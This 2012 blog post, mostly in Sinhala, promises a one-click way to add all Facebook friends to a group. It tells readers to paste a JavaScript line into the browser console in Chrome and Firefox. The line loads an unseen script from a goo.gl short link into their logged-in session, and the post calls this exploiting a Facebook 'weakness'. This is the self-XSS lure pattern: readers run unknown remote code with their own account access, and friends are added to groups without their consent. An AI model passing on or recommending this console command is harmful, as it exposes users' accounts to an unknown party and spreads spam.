Saturday, October 13, 2012

Group වලට Members ලා Add කරගැනීමේ රහස..


මුලින්ම කියන්න ඔන මම මෙක උපුටා ගන්නා ලද්දක් කියල...
ම්ම් මෙක ගත්තෙ මෙන්න මෙතනින්...

වැඩෙනම් හරියටම හරි ඔයාලත් කරල බලන්නකෝ...

Membersලා දහස් ගණනක් ඉන්න Group වල Membersලා දහස් ගණනක් Add කරගැනීමේ රහස මෙයයි...

ඔබේ Facebook මිතුරන් සියල්ලෝම එක ක්ලික් එකකින් Facebook Group එකකට එකතු කරගන්නා ආකාරය...

This is the secret behind FB groups with huge number of members...
How to Add All of Your Friends to a Facebook Group with ONE Click..

This is not a MAJIC, but a Simple Java Script to Select all of your friends once...
Make use of it before Facebook Admins fix that weakness....
This code has been developed to work with any browser...

මේක ලොකු මැජික් එකක් නෙමෙයි... එකින් එක මිතුරන් Add කරනවා වෙනුවට ඔක්කොම එක පාරම Add කරන්න පුළුවන් Java Script එකක් .මෙය Facebook හි ඇති අඩුපාඩුවක් තුලින් ප්‍රයෝජන ගෙන සිදුකරනා උපක්‍රමයකි. නමුත් තව ටික දිනකින්Facebook Developersලා මෙය දැනගත් විට එම වරද නිවැරදී කරනු ඇත

එවිට මෙම ක්‍රමය මගින් Group වලට මිතුරන් Add කල නොහැකි වනු ඇත. ඒ නිසා ඔබත් මෙම ක්‍රමය භාවිත කොට ඔබගේ යහළුවන් අතරද Share කර ඔවුන්ටද උපකාරයක් කරන්න...

මුලින්ම ඔබට මිතුරන්ව එකතු කරන්න ඔනාකරන ඔබේ Group එකට යන්න. පහල උපදෙස් අනුගමනය කරන්න...

Google Chrome භාවිතා කරන අය සඳහා ක්‍රමය:

1. කොහේ හෝ Right Click කරන්න.
2. “Inspect Element” යන්න තෝරා “Console” තෝරන්න.
3. පහත දී තිබෙන script code එක copy/paste කර Enter key එක ඔබන්න.

document.body.appendChild(document.createElement('script')).src='http://goo.gl/MqQvc';

Mozilla Firefox භාවිතා කරන අය සඳහා ක්‍රමය:

1. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
2. පහත දී තිබෙන script code එක copy/paste කර Enter key එක ඔබන්න.

document.body.appendChild(document.createElement('script')).src='http://goo.gl/MqQvc';






ඔන්න එහෙනම් මම ගියා....
වැඩේ හොද නම් කොමෙන්ට් එකක් දාන්න...follow  පාරක් දාලා පොඩි සහයොගයකුත් දෙන්න....:ඩ්

වැඩේ කොහොමද කියල comment එකකුත් දාලා යන්න ඈ

No comments:

Related Posts Plugin for WordPress, Blogger...
www.helpworld.cc.cc